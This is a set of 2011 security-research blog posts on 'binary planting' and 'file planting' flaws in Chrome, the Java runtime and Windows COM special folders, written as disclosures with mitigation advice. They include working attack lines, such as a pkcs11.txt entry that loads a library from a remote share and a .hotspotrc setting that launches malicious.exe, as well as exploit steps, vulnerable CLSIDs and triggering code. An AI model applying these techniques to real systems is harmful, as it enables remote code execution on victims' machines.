Thursday, October 20, 2011

Google Chrome pkcs11.txt File Planting

A Vuln, Or Not A Vuln, That Is The Question

[Update 10/27/2011: Chrome 15, released two days ago, makes this bug even harder to exploit as its phishing and malware protection (enabled by default in Chrome's Under the Hood options) now sends an HTTPS request to one of its servers immediately upon startup. Therefore, in addition to not having Google as the search engine and not having visited any HTTPS addresses before the attack, the user would also have to disable phishing and malware protection in order for this bug to be exploitable.]

Thirty days ago our company notified Google about a peculiar behavior of the Chrome browser that can be exploited for execution of remote code outside the Chrome sandbox under specific conditions. It is another case of file planting, where an application loads a data file (as opposed to a binary file, which would make it binary planting) from the current working directory. Similarly to our previously reported file planting in the Java Runtime Environment (still present in the current build, 1.6.0_29, if you want to play with it), Chrome loads a data file, namely pkcs11.txt, from the root of the current working directory and, in case the file exists, parses and processes its content. Security-wise, the most interesting value in a pkcs11.txt file is called library. Consider the following line in pkcs11.txt:

library=c:\temp\malicious.dll

This line instructs Chrome to load the library c:\temp\malicious.dll. It also works with remote shared folders, which opens the door to remote code execution attacks; our demonstration uses the following line:

library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib

In addition, the library file doesn't have to have a known extension (such as ".dll"), which makes it harder to block on a firewall.

Finally, the Chrome sandbox doesn't provide any protection here, as the entire process of loading pkcs11.txt and the associated library is performed by the parent chrome.exe process.
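
To make the class of problem concrete, here is an illustrative sketch (our own code, not Chrome's or NSS's; the function name and structure are ours) of what it means for a configuration parser to trust a library= value and hand it straight to LoadLibrary:

  #include <windows.h>
  #include <fstream>
  #include <string>

  // Illustrative only: a parser that reads "library=<path>" from a config
  // file and loads whatever path it finds there.
  HMODULE LoadPkcs11ModuleFromConfig(const std::string& configPath) {
      std::ifstream config(configPath.c_str());  // caller passes e.g. the file \pkcs11.txt
      std::string line;
      const std::string key = "library=";
      while (std::getline(config, line)) {
          if (line.compare(0, key.size(), key) == 0) {
              std::string libraryPath = line.substr(key.size());
              // The value is used verbatim, so library=\\server\share\malicious.lib
              // makes this call reach out to a remote share.
              return LoadLibraryA(libraryPath.c_str());
          }
      }
      return NULL;
  }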


HTTPS, NSS And pkcs11.txt

Chrome loads "/pkcs11.txt" the first time it needs to do anything encryption-related, which in most cases means visiting an HTTPS URL. Chrome developers tracked this issue to one of Mozilla's Network Security Services (NSS) libraries, and it seems that it is a matter of unfortunate circumstances that gave life to this bug in Chrome, although the same bug may potentially exist in some other products integrating NSS libraries.


Exploit Conditions

If you carefully read the previous paragraph, you noticed two things: 

  1. Chrome loads pkcs11.txt the first time it needs PKCS #11 capabilities, and it never does so again until re-launched. This means that if the user has already visited an HTTPS address before, or any of the sites he visited has loaded an image or any other data via HTTPS, the attack opportunity is gone. What makes things worse for the attacker is the fact that when Google is the selected search engine (and it is by default), Chrome sends a request to https://www.google.com/searchdomaincheck... to determine your local Google domain immediately upon startup. This triggers the loading of pkcs11.txt from the root of the user's local system drive and closes the attacker's window of opportunity before it was ever really opened.
  2. The initial forward slash in the file name "/pkcs11.txt" means that pkcs11.txt will be loaded from the root of the current working directory's drive or share, not from the current working directory itself. For instance, if the current working directory is C:\users\james\, Chrome will try to load C:\pkcs11.txt. In the shared folder case, if the current working directory is \\server\share\somefolder\, Chrome will try to load \\server\share\pkcs11.txt. (The short snippet below illustrates this resolution rule.)
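
If you want to verify this resolution rule yourself, a minimal snippet (our own, unrelated to Chrome's code) is enough:

  #include <windows.h>
  #include <stdio.h>

  int main(void) {
      // "\pkcs11.txt" is rooted but has no drive, so only the drive (or share)
      // root of the current working directory is kept: with a CWD of
      // C:\users\james this prints C:\pkcs11.txt, and with a CWD of
      // \\server\share\somefolder it prints \\server\share\pkcs11.txt.
      char resolved[MAX_PATH];
      GetFullPathNameA("\\pkcs11.txt", MAX_PATH, resolved, NULL);
      printf("%s\n", resolved);
      return 0;
  }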


So how can this vulnerability be exploited? Three conditions need to be met:

  1. Google must not be the selected search engine. This setting is configurable under the Options page, and users can set Yahoo, Bing, or any other search provider as their selected search engine. We confirmed that Yahoo and Bing don't send any HTTPS requests when Chrome is launched and are therefore suitable for mounting the attack.
  2. User must not have visited any HTTPS resources before the attack. As described above, the attack relies on the fact that the NSS capabilities have not yet been initialized in the running parent Chrome process. Ideally for the attacker, the user would have just launched Chrome and not yet visited any web sites that send HTTPS requests.
  3. Chrome's current working directory must be set to an attacker-controlled location. Since Chrome sets its current working directory to its own folder on the user's machine upon startup, double-clicking an HTML file in a remote shared folder (which often works for binary planting attacks) wouldn't achieve anything for the attacker. The best remaining way we know of to set the current working directory in Chrome is then through the file browse dialogs, as the sketch after this list illustrates. If the attacker could get the user to try to load a file from her network shared folder, and trigger the first HTTPS request while the user had this folder opened in the "Open" dialog, Chrome would load pkcs11.txt from the root of the attacker's network share and load the library specified in it.
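
The following minimal sketch (ours, not Chrome's) shows why file browse dialogs are such a convenient lever: unless a caller passes the OFN_NOCHANGEDIR flag, the common "Open" dialog leaves the process's current working directory wherever the user last browsed to.

  #include <windows.h>
  #include <commdlg.h>
  #include <stdio.h>
  #pragma comment(lib, "comdlg32.lib")

  int main(void) {
      char fileName[MAX_PATH] = "";
      OPENFILENAMEA ofn = { sizeof(ofn) };   // note: no OFN_NOCHANGEDIR flag set
      ofn.lpstrFile = fileName;
      ofn.nMaxFile = MAX_PATH;
      GetOpenFileNameA(&ofn);                // user browses to, say, \\attacker\share\...

      char cwd[MAX_PATH];
      GetCurrentDirectoryA(MAX_PATH, cwd);
      printf("CWD after the dialog: %s\n", cwd);   // now the browsed-to folder
      return 0;
  }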

On-Line Demonstration

We have prepared an on-line demonstration at http://www.binaryplanting.com/demo/chrome_pkcs11Planting/. Simply open this page with Chrome and follow instructions. If you don't have Chrome handy and want to see what would happen if you did, here's a video of this demonstration:



Attack Improvements And Variations

Our demonstration requires you to wait until the countdown reaches 0 before the attack is completed and the remote DLL is loaded. This wait is there to make sure the "Open" dialog has successfully loaded the remote shared folder, which can take anywhere from 5 to 30 seconds according to our tests. A real attack would not keep you waiting: the attacker-controlled server could detect the incoming requests (SMB or WebDAV) indicating that Chrome's current working directory has been set to its network share, and then instruct the web page already loaded in Chrome to make some HTTPS request - which would result in Chrome loading pkcs11.txt from the attacker's network share just like in our demonstration.

The current working directory can also be set via the "Save As..." dialog and any other file browse dialog the attacker feels her victim would most likely be duped into opening.

A bizarre local variant of this same exploit is also possible in the extremely unlikely case that the user has his Downloads folder in the root of one of his local drives. In that case, all the attacker would have to do is get a malicious pkcs11.txt downloaded by the user's Chrome (which can happen in a drive-by fashion, as .txt is not a "dangerous" extension) and wait for the user to open the "Save As..." dialog, which by default opens in the Downloads folder.


So, Is This A Vulnerability Or Not?

Google decided that this was not a vulnerability, but rather a "strange behavior that [they] should consider changing". The reason they provided was that "the social engineering level involved here is significantly higher than 'Your computer is infected with a virus, download this free anti-virus software and run the exe file to fix it.'"

This is actually hard to dispute. From the attacker's perspective, given these two attack options, she would probably be more successful with the "fake anti-virus" one than with the "file planting" one. However, the "fake anti-virus" option may not work against corporate users whose firewalls are likely to prevent them from downloading an executable, and who may not be technically allowed (e.g., with AppLocker) to launch unauthorized executables. Additionally, employees who attended at least one security awareness session could be more suspicious of a "please download and execute this" request than of an "open a file from this folder" one. Then again, they may not be - who knows.

Regardless, as security researchers we consider any "feature" that allows silent downloading of remote code and its execution on the user's computer without warnings a vulnerability. Clearly the same criteria cannot apply to Joe Average and to someone working at a nuclear power plant, and it's not a big deal if Google doesn't share our vulnerability criteria (security experts disagree on many things all the time), but Google's reasoning opens up an interesting and important question: how much social engineering is too much?

Microsoft's Security Intelligence Report Volume 11 reveals (based on Microsoft's data) that 88% of attacks in the first half of 2011 depended on what they call "user interaction" and "feature abuse", both of which are part of what is generally considered "social engineering," i.e., getting users to do something they otherwise wouldn't. While this doesn't answer the above question, it sheds some light on how prevalent, and successful, social engineering seems to be in real attacks out there. It seems plausible that as technical security countermeasures block more and more attack paths, attackers will be looking for the remaining paths of least resistance - both technical and social.


What Can We Learn?


  1. Loading data files from untrusted locations can be dangerous, and this includes the current working directory. Action item: fire up Process Monitor while testing your applications and see what they're loading.
  2. 3rd party libraries can introduce vulnerabilities into your software, and possibly only into your software. Action item: use 3rd party libraries whose developers are quick to fix issues, or at least libraries you can patch yourself. (The NSS library with this particular bug fortunately has both of these properties.)
  3. What is a vulnerability to some can be just strange behavior to others, and there are no industry-wide criteria for telling who's right. (Although we can probably agree that the actual attacker is always right.) Action item for the issue described in this post: make sure your Chrome home page is an HTTPS address or loads at least one HTTPS resource, and you won't have to care who's right.


(This fine piece of security analysis has been done by Luka Treiber, security researcher at ACROS Security. Follow us on Twitter and stay updated on our future research.)

Monday, September 26, 2011

More Misconceptions About Binary Planting

Last year, soon after revealing our binary planting research project, we published a blog post clearing up five misconceptions that were frequently appearing at that time. Over a year (and about a hundred publicly fixed binary planting bugs in all sorts of software products) later, we're noticing a different set of misconceptions in public forums and on mailing lists. While we made our best effort to present binary planting in as comprehensible and clear a way as we could, we accept responsibility for our undoubtedly imperfect rendition and hope this post will help interested readers better understand our arguments.


Misconception #6: "This is a local attack."

We still occasionally come across this misconception that in a binary planting attack, the user has to willfully download a DLL or EXE and place it in some particular location on his computer, from where it will subsequently be launched. If this were true, binary planting would certainly be a ridiculous concept.

Actually though, in a typical binary planting attack the user doesn't have to download anything to his computer. He opens a file from a remote (attacker-controlled) shared folder and the vulnerable application on his computer automatically, silently executes a DLL or EXE from that same remote folder. Moreover, advanced attacks don't even require the user to do anything more than, for example, visiting a web page and clicking on two links - now who isn't doing that on a daily basis?


Misconception #7: "It doesn't work remotely on a default Windows machine."

We've heard objections that perimeter firewalls in typical networks won't allow internal Windows computers to access shared folders on an Internet-based server due to their default blocking of outbound SMB connections.

Windows 2003 Server introduced a Web Client service, which is an automatic WebDAV redirector for Windows networking connections. In short, this service makes it possible for Windows users to connect to remote network shared folders via the HTTP protocol, and this happens automatically when such connections via the SMB protocol fail. This means that even if a perimeter firewall blocks SMB network traffic towards the Internet, Windows will automatically try to connect to a remote shared folder via WebDAV (which is an extension of HTTP). We believe very few perimeter firewalls block outbound HTTP traffic as this would mean that internal users wouldn't be able to use their web browsers. WebDAV-only outbound blocking can be done by various firewalls, but this doesn't seem to be their default behavior in general *.

Anyone wishing to test whether their firewall allows outbound WebDAV connections can try to visit \\www.binaryplanting.com\demo with Windows Explorer on a reasonably default non-server Windows machine (with the Web Client service running or at least not disabled on a Windows 7 system).


Misconception #8: "Attacker could just as well get the user to open an executable."

We've heard this objection more than once and it goes like this: If in a typical binary planting attack scenario, the attacker has to trick the user to double-click a data file from a remote shared folder (which results in a vulnerable application loading a malicious DLL from the same folder), why couldn't the attacker simply get the user to double-click a malicious EXE with an icon of a data file?

It is entirely true that one can give an EXE an arbitrary icon and make it look exactly like any chosen data file such as Microsoft Word DOC or Adobe Reader PDF document. Furthermore, one can even disguise the way the file extension is displayed to the user using the UNICODE "right to left" trick. This makes it impossible for a user to visually distinguish an executable from a document file without manually inspecting their properties.

However, the difference comes after double-clicking the file, as long as this file is on a network share (as opposed to on a local drive): in case of a data file, the application associated with this file type gets launched and opens the data file; but in case of an executable, Windows displays a security warning saying that the user is about to launch an executable from a network location and asking for the user's permission to do so (see image below). While we have no field data on how effective such a warning would be in stopping a "disguised executable" remote attack, it enables organizations to educate their users and increase their odds.




Moreover, double-clicking a file is not the only way to successfully trigger binary planting. The role of double-clicking in the attack is to set the current working directory to the location of the data file, so that the vulnerable application subsequently loads the malicious DLL from there. But the current working directory can also be set by opening the same data file a different way: first launching the application and then using the File Open dialog to browse to the file and open it. (Very few applications don't change the current working directory this way.) Now, the file browse dialog will not show the disguised executable, as it has an unsupported extension that doesn't match the file type filter, and it will not launch the disguised executable even if the user selects the "All files" filter, selects the executable and presses the "Open" button.

We hope this adequately describes the significant difference between a remote data file and a remote disguised executable in the context of a binary planting attack.


Credits

We'd like to end this post by thanking everyone contributing in public or private debates about binary planting vulnerabilities. We may not always all agree on everything, but such exchange of views, opinions and facts is exactly where new and better knowledge comes from. Thank you!


(* The amount of successfully received WebDAV requests from large and small organizations to our testing WebDAV server confirms that many perimeter firewalls are not blocking outbound WebDAV.)

Thursday, September 15, 2011

Microsoft's Binary Planting Clean-Up Mission

Slow, But Moving In The Right Direction

Since our presentation of COM server-based binary planting exploits at the Hack in the Box conference in May this year, Microsoft has introduced a number of relevant changes to Windows and Internet Explorer. To refresh our memory: in Windows, so-called "special folders" (e.g., Control Panel or My Computer) are implemented as in-process COM servers associated with unique CLSIDs, and our researchers found that opening a file from an ordinary folder whose name extension equals one of these CLSIDs results in various DLLs being loaded and executed from this same folder. This has obvious security implications (details here and here) and our advanced binary planting research leveraged it to the point where it was possible to attack a user through Internet Explorer on both Windows XP and Windows 7.

Change #1: No "file://" Inside "http://"

The proof of concept we prepared was a web page that included a tiny (1 by 1 pixel) iframe hosting the content of a remote shared folder; when the user clicked anywhere on that page, he actually clicked inside the shared folder: the first click selected a file there, and the second one initiated printing, which triggered the binary planting bug.

Microsoft changed the behavior of Internet Explorer such that a web page (served via http://) can't display the content of a shared folder (served via file://) in a frame/iframe. This is good: there are probably very few cases where such mixture would be legitimately needed. And if you have a case like that, you can always put your web page in the "Trusted sites" zone.

Naturally this broke our proof of concept as we delivered it via http:// from http://www.binaryplanting.com/demo/XP_2-click/test.html. However it is not difficult to circumvent this limitation: if the main web page is loaded via file:// as well, it will be allowed to display a remote share in a frame/iframe, at least if it's coming from the same server. Therefore our proof of concept could be brought back to life simply by having it loaded via file:// from file://\\www.binaryplanting.com\demo\XP_2-click\test.html.

Change #2: No "file://" From "http://"

If you're reading this in Internet Explorer and try to click on the file:// link at the end of the last paragraph, you will probably notice that it doesn't work. This was the second change introduced to Internet Explorer, and again a good one. An obvious attack vector for the typical double-click binary planting attacks is a link on a web page that opens up Windows Explorer with attacker's remote shared folder. Since most users would not be able to distinguish between the displayed "malicious" folder and a shared folder in their internal network, they could easily open a document in it - and get their computer owned.
Not allowing a web page loaded via http:// to open a file:// URL blocks this attack vector and this is good. Since other leading web browsers don't launch file:// URLs in Windows Explorer, the attacker is now left with secondary attack vectors such as e-mail, various documents and instant messages. (Unless he finds a way to circumvent this new IE barrier.)

Change #3: Away With deskpan.dll On Windows XP

The September Windows update MS11-071 introduced a number of changes, but the one most relevant to this post is the removal of a non-functional COM server on Windows XP registered with a non-existing DLL called deskpan.dll, which was used in our proof of concept. Esteemed paranoid readers of our blog have manually removed this COM server 100+ days earlier when we recommended it in May (see "How to protect yourself" section). We welcome Microsoft's move to fix this exploitable configuration error as part of a security update.

However...

As we already hinted before, we found that many well-registered COM servers on all Windows versions, having specified their DLL with an absolute path, load additional DLLs with a relative path, and many of these DLLs do not exist. This provides extensive binary planting potential to a great number of flawed LoadLibrary calls that could previously be considered non-exploitable.

For instance, an attacker - having had the deskpan.dll COM server taken away from him - can migrate his Windows XP exploit to the COM server with CLSID {32714800-2E5F-11d0-8B85-00AA0044F941}. This COM server loads C:\Program Files\Outlook Express\wabfind.dll (which exists), but this DLL then tries to load wab32res.dll without a full path. While wab32res.dll does exist in C:\Program Files\Common Files\System\, this folder comes after the current working directory in the search order - allowing a fake wab32res.dll to be loaded and executed from the attacker's "special" folder.

Furthermore, our research found that there are at least ten additional vulnerable COM servers on a default Windows XP installation.

Finally, the COM server-based binary planting vulnerability we described on Windows 7 has not been fixed yet. The "AnalogCable Class" COM server, registered with CLSID {2E095DD0-AF56-47E4-A099-EAC038DECC24}, still loads and executes ehTrace.dll from the attacker's folder.

Conclusion

Microsoft is clearly putting an effort into removing binary planting bugs from their code and introducing mitigations that help block various binary planting attack vectors. While we know there's still a lot of cleaning up to do in their binary planting closet, our research-oriented minds remain challenged to find new ways of exploiting these critical bugs and bypassing new and old countermeasures. In the end, it was our research that got the ball rolling and it would be a missed opportunity for everyone's security if we didn't leverage the current momentum and keep researching.

Stay tuned - follow our research on Twitter.

Friday, July 8, 2011

Binary Planting Goes "Any File Type"

File Planting: A Sample From Our Security Research


It's been almost a year since we revealed our Binary Planting research project which identified 520+ remote execution vulnerabilities in almost all Windows applications. During this period, hundreds of binary planting vulnerabilities have been publicly reported and some have actually been fixed.

While some in the security community still seem to have a hard time understanding that binary planting affects not only the loading of libraries but also the launching of stand-alone executables, we went further and "extended" the problem to all file types. This blog post reveals an interesting sample from our current research on what we call File Planting.


Java Hotspot VM Configuration Files

The current version of Oracle's Java Runtime Environment (version 6, update 26) - just like its previous versions - supports the so-called Hotspot configuration files .hotspotrc and .hotspot_compiler. These files are loaded when the Java virtual machine is initialized and can, respectively, specify (or override) VM settings that are usually provided as command-line parameters to java.exe, or exclude chosen methods from compilation.

Now this would be just fine... if the JRE didn't try to load these configuration files from - you guessed it - the current working directory. So if the current working directory (which we now all know can point to various locations, including a remote share on the attacker's server) contains these configuration files, they will be loaded and will influence the way the Java virtual machine behaves.

We focused our analysis on the .hotspotrc file, since fiddling with VM settings seemed more promising from the security point of view. And indeed, we quickly located a VM setting that can be exploited for launching an arbitrary executable: OnOutOfMemoryError. This setting allows one to specify user-defined commands that get run in case the JRE runs out of memory, or more specifically, when the OutOfMemoryError error is thrown for the first time. Therefore:


OnOutOfMemoryError="malicious.exe"

 plus

Java code that exhausts all available memory

 equals

launching of malicious.exe.
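
For comparison, the same setting is normally passed as a (non-standard) command-line option to java.exe; the class name below is just a placeholder of ours:

  java -XX:OnOutOfMemoryError="malicious.exe" SomeMemoryHungryClass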


Now, how does one set the current working directory for the JRE to an attacker-controlled location? Normally, when Java applications are launched either manually or as a service, this is rather difficult if possible at all: in the former case, the current working directory is set to the location of the user's command-line window, and in the latter case, the current working directory is inherited from the parent process and cannot be influenced by a low-privileged - much less remote - attacker.

The game changes, as it often does, in web browsers. All major web browsers support Java, and can load and execute a remote Java applet inside a web page.


Exploiting The Bug

For this experiment we need four files, which you can find neatly packed on our web page:

  1. .hotspotrc : a Java configuration file with a single line OnOutOfMemoryError="malicious.exe"
  2. Test.class : a Java applet that consumes all available memory (ours simply concatenates a string to itself many many times)
  3. Test.html :  an HTML document that loads the applet
  4. malicious.exe : the executable to get executed

Suppose the current version of Apple Safari (5.0.5) is our default web browser. If we put the above files in the same directory (on a local drive or a remote share) and double-click Test.html, what happens is the following:

  1. Safari gets launched and sets its current working directory to the location of Test.html. (Not intentionally - Windows Explorer sets the CWD this way for all launched applications.)
  2. Safari loads and renders Test.html from our directory.
  3. Test.html invokes a Java applet called Test.class, triggering the initialization of the Java virtual machine. 
  4. jvm.dll, the Java Hotspot Client virtual machine running inside the Safari process, loads .hotspotrc from our directory, parses it and employs the OnOutOfMemoryError setting found inside.
  5. jvm.dll loads the Java applet Test.class from our directory and executes it inside the Safari process, causing an OutOfMemoryError error within seconds.
  6. jvm.dll responds to the OutOfMemoryError error according to the OnOutOfMemoryError setting and launches malicious.exe from our directory using a CreateProcess call.


The attack can be mounted in the same way through Mozilla Firefox (any version), with the slight difference that Firefox actually launches an external java.exe process, which then runs malicious.exe. Furthermore, this attack can also be mounted through Internet Explorer or Google Chrome, although these set their current working directory to some safe location, meaning extra work for the attacker. (More on this some other time.)

Similarly to binary planting attacks, this file planting attack can also be mounted from a remote share, even from a WebDAV share on an Internet server. Since the malicious executable is launched with CreateProcess, there will be no security warning due to launching a remote file.
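
Here is a minimal sketch of that last step (the path is hypothetical and this is not the JRE's code): CreateProcess starts an executable straight from a UNC path, and the usual "you are about to run a program from the Internet" style prompt never appears because that prompt is shown by the shell's launch path, which is not involved here.

  #include <windows.h>

  int main(void) {
      STARTUPINFOA si = { sizeof(si) };
      PROCESS_INFORMATION pi;
      // Hypothetical remote path; the command line buffer must be writable.
      char cmd[] = "\\\\server\\share\\malicious.exe";
      if (CreateProcessA(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
          CloseHandle(pi.hThread);
          CloseHandle(pi.hProcess);
      }
      return 0;
  }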

Note that neither Safari nor Firefox, nor any other web browsers are at fault here. They merely play the role of an attack delivery vehicle, while the security error is in Oracle's code.


File Planting vs. Binary Planting

File planting shares a common attribute with binary planting in that files (data files or binaries) are loaded from the current working directory, which the attacker can control and use to plant a malicious file. Two major differences between file planting and binary planting, however, are:

First, a binary planting exploit looks the same in 99% of cases. If an application is willing to load your DLL or launch your EXE, you simply plant a generic malicious DLL/EXE and it almost always works. In a file planting attack, you have to understand the context of the file, what the application does with it and how (if at all) your ability to plant the file can be leveraged to mount a decent attack.

Second, some binary planting attacks can be blocked by firewalls that don't let computers in internal networks download executables from the Internet (based on files' extensions or content), and by web browsers that block downloading of such potentially dangerous files. With file planting, there can be no predefined rule to recognize a potentially malicious data file.

There are also many other interesting, significant as well as subtle differences between the two, but let this be enough for now.


What Should Oracle Do To Fix This Bug?

JRE should stop loading its configuration files from the current working directory, at least on Windows. This may not be so easy to do as some developers and their applications likely depend on this feature and doing so might break these applications. A fairly risky compromise would be to prevent loading of configuration files from the current working directory when JRE is invoked from web browsers, which would address the scope presented here. The risk would be that some other applications may also launch or integrate JRE and may thus provide a similar attack vector. A thorough functional and security analysis of this issue is thus inevitable if Oracle wants to fix this bug properly.



(Credit for the research presented here goes to my colleagues, security researchers at ACROS Security: Jure Skofic for developing the uber vulnerability detector and Simon Raner for a great analysis of this vulnerability.)

Thursday, June 2, 2011

COM Server-Based Binary Planting Proof Of Concept

[Update September 19, 2011: Windows update MS11-071 breaks this proof of concept by removing the deskpan.dll registry reference. It thus no longer works but can still be used as a learning reference.]

For educational purposes we decided to publish a proof of concept (PoC) for the COM Server-Based Binary Planting attacks described in our previous post. We prepared both online and offline versions for 32-bit Windows XP running Internet Explorer 8.

Online Proof of Concept

Visit \\www.binaryplanting.com\demo\XP_2-click\test.html (with Internet Explorer) and follow instructions. You must have WebDAV communication with the Internet enabled and must not have the CWDIllegalInDllSearch hotfix installed.

Offline Proof of Concept

Download a ZIP archive of the PoC here, extract it and follow the instructions in readme.txt. You can test the PoC either from a local network share or locally on a single Windows XP machine.


Conditions And Potential Weaponization


Note that this is a proof of concept only, not a weaponized exploit. The reliability thus depends on a few factors:

  1. You have to be running Internet Explorer 8 on 32-bit Windows XP (although it probably works on IE 7 too). A weaponized exploit could automatically detect user's Windows and IE version and provide an exploit for 32-bit and 64-bit XP, Vista or Windows 7 accordingly. 
  2. You have to have "Show common tasks in folders" selected under the "Folder options" in Windows Explorer. (This is the default setting.) A weaponized exploit could use various attack vectors for different user configurations.
  3. The automatic COM Server launching process in relation with special folders is largely undocumented and can be unpredictable. A weaponized exploit could initiate various special folders-related activities for further improving the reliability.
  4. The SMB-to-WebDAV fallback takes a while (usually 10-15 seconds in our tests) and our PoC requires you to wait. A weaponized exploit could initiate this communication in the background while the user was reading an interesting text from the web page.

You're welcome to follow our research on Twitter.

Tuesday, May 24, 2011

The Anatomy of COM Server-Based Binary Planting Exploits

[June 2, 2011 update: we published a proof of concept for this vulnerability.]

Last week at the Hack In The Box conference in Amsterdam we presented some techniques for advanced exploitation of binary planting bugs. The stage was set by our previous blog post where we described how unsafely registered COM server DLLs, as well as safely registered COM server DLLs that make unsafe binary loading calls, could be abused for mounting binary planting attacks. This post reveals our work to the rest of the world.


The Magic Of Special Folders

One of the elements we used in our exploits were Windows special folders. Special folders are folders that can be shown by Windows Explorer but don't always behave like ordinary folders, which simply contain files and other folders. Some examples of special folders are Control Panel, My Computer, My Documents, Administrative Tools and Printers. Every one of these special folders is implemented as an in-process COM server with a specific class identifier (CLSID). For instance, the CLSID of My Computer is {20D04FE0-3AEA-1069-A2D8-08002B30309D}.

Let's begin with a small magic trick (works on XP, Vista and Windows 7): Create a new empty folder anywhere on your file system and rename it to folder.{20D04FE0-3AEA-1069-A2D8-08002B30309D}. (Note that the CLSID must be the extension of the folder name, i.e., must come after the final dot.) Immediately after renaming, the folder's icon will be changed to the icon of My Computer and, moreover, opening the folder will actually show the My Computer content.
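
The trick is just as easy to script as it is to perform by hand - creating a folder with the CLSID as its "extension" is all it takes (a one-call sketch of ours):

  #include <windows.h>

  int main(void) {
      // Explorer does the rest as soon as the folder is shown or opened.
      CreateDirectoryW(L"folder.{20D04FE0-3AEA-1069-A2D8-08002B30309D}", NULL);
      return 0;
  }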

Apart from having an obvious entertainment value, this trick also plays an important role in our exploits. Many applications, when processing files from special folders or displaying the content of special folders, trigger the instantiation of such folders' COM servers based on the CLSIDs in their extensions. Which brings us to the first exploit.


Double-Click Attack 1: Wordpad on Windows XP

As already mentioned in our stage-setting blog post, all Windows XP installations have a registered COM server called "Display Panning CPL Extension" with CLSID {42071714-76d4-11d1-8b24-00a0c9068ff3}, implemented by a non-existing deskpan.dll. Consequently, if some application decided to instantiate such a COM server, this would result in loading deskpan.dll from the current working directory. As you might have guessed, the special folders magic can make an application instantiate just about any registered COM server. Let's do this with Wordpad.
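
For reference, the "malicious" DLL in such a proof of concept is typically nothing more than a DllMain that announces itself; here is a harmless sketch (not the actual demo DLL we used):

  #include <windows.h>

  BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
      if (fdwReason == DLL_PROCESS_ATTACH) {
          // Any code here runs inside the process that loaded the planted DLL.
          MessageBoxA(NULL, "deskpan.dll loaded from the current working directory",
                      "Binary planting PoC", MB_OK);
      }
      return TRUE;
  }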

The video below shows the following procedure:

  1. create a "malicious" deskpan.dll;
  2. create a new folder and rename it to files.{42071714-76d4-11d1-8b24-00a0c9068ff3} - note that Windows XP hides the folder extension, and that this special folder still behaves like an ordinary folder;
  3. copy the malicious deskpan.dll to the new folder;
  4. open the folder;
  5. create a new rich text document in the folder;
  6. double-click the rich-text document.




After double-clicking the rich text document, Wordpad gets launched and its current working directory gets set to the special folder (which is the expected behavior). However, for reasons unknown to us, Wordpad then triggers a call to the COM server-instantiating function CoCreateInstance with the CLSID of our special folder. This causes a registry lookup for the COM server DLL (deskpan.dll), and then an attempt to load this DLL using a LoadLibrary call. Since this DLL is found neither in Wordpad's home directory nor in any of the Windows system folders, the "malicious" deskpan.dll is finally loaded from our special folder and executed.
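
The same DLL-loading chain can be reproduced without Wordpad; the following test snippet of ours, run from a folder containing a planted deskpan.dll, triggers it directly:

  #include <windows.h>
  #include <objbase.h>
  #pragma comment(lib, "ole32.lib")
  #pragma comment(lib, "uuid.lib")

  int main(void) {
      CoInitialize(NULL);
      CLSID clsid;
      CLSIDFromString(L"{42071714-76d4-11d1-8b24-00a0c9068ff3}", &clsid);

      IUnknown* pUnk = NULL;
      // The call itself fails (our planted DLL is not a real COM server),
      // but by the time it returns, the DLL has been loaded and its
      // DllMain has already run.
      CoCreateInstance(clsid, NULL, CLSCTX_INPROC_SERVER, IID_IUnknown, (void**)&pUnk);
      if (pUnk) pUnk->Release();

      CoUninitialize();
      return 0;
  }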


Double-Click Attack 2: Applications on Windows 7

In contrast to Windows XP, a fresh installation of Windows 7 has no unsafely registered in-process COM servers. It does, however, have several safely registered COM servers whose DLLs make unsafe library loading calls. (XP and Vista have such DLLs too.)

One such case on Windows 7 is the COM server called "AnalogCable Class", registered with CLSID {2E095DD0-AF56-47E4-A099-EAC038DECC24} and having C:\Windows\System32\PsisDecd.dll as its DLL. When an application instantiates this COM server, the PsisDecd.dll is loaded from the System32 folder (which is okay), but this DLL quickly makes a call to LoadLibrary("ehTrace.dll"). Now it's not that ehTrace.dll doesn't exist on Windows 7: it does exist in folder C:\Windows\ehome - but applications launched outside this folder are unable to find it. This means that applications from folder C:\Windows\ehome, for instance ehshell.exe, can safely and successfully instantiate the said COM server, while other applications automatically become vulnerable if they try to do the same.

The video shows the following procedure:

  1. create a "malicious" ehTrace.dll;
  2. create a new Microsoft Word 2010 document;
  3. create a new Microsoft PowerPoint 2010 document;
  4. create a new text document;
  5. create a new PDF document;
  6. create a new folder and rename it to files.{2E095DD0-AF56-47E4-A099-EAC038DECC24} - note that Windows 7 also hides the folder extension, and that this special folder still behaves like an ordinary folder;
  7. copy all four data files and the "malicious" DLL to the new folder;
  8. open the folder;
  9. double-click the Word document; (causing Word 2010 to execute the "malicious" ehTrace.dll)
  10. double-click the PowerPoint document; (causing PowerPoint 2010 to execute the "malicious" ehTrace.dll)
  11. double-click the PDF document; (causing Nitro PDF Reader to execute the "malicious" ehTrace.dll)
  12. double-click the text document; (launching Notepad but not immediately executing the "malicious" DLL)
  13. select "File -> Save As" from the menu in Notepad. (causing Notepad to execute the "malicious" ehTrace.dll)




Similarly to the Wordpad exploit on Windows XP, the above exploits are based on the curious and heavily undocumented nature of special folders, which makes otherwise innocent applications instantiate chosen COM servers. Thus Word, PowerPoint and Nitro PDF Reader (and many other applications) all try to instantiate the "AnalogCable Class" COM server while having their current working directory set to our special folder. This results in a search for ehTrace.dll, and in the loading of "malicious" ehTrace.dll from our special folder. The final target, Notepad, does not get hacked simply by opening a file - but does execute the "malicious" DLL when the "Save As" dialog is opened. Apparently Notepad does not automatically trigger the COM server instantiation when a document is loaded, but opening the "Save As" dialog causes the code behind this dialog to interact with the special folder, thus instantiating the appropriate COM server.


Leveraging COM Server Exploits Through Web Browsers

Skeptics among you may say that, okay, this opens up new attack vectors for various binary planting vulnerabilities, but the user would still have to double-click a document on a remote share. And users wouldn't do that, would they? (Of course they would but let's pretend they wouldn't.) So in order to satisfy the most demanding among you, we leveraged the above exploits through web browsers, resulting in some pretty user-friendly scenarios, in a manner of speaking. Let's start with Windows XP and Internet Explorer 8.



Web Attack 1: Internet Explorer 8 on Windows XP


The following video shows how a user would experience the attack. Visiting a malicious web site, clicking once on one link, and again on another, is enough to get a remote binary executed on his computer.





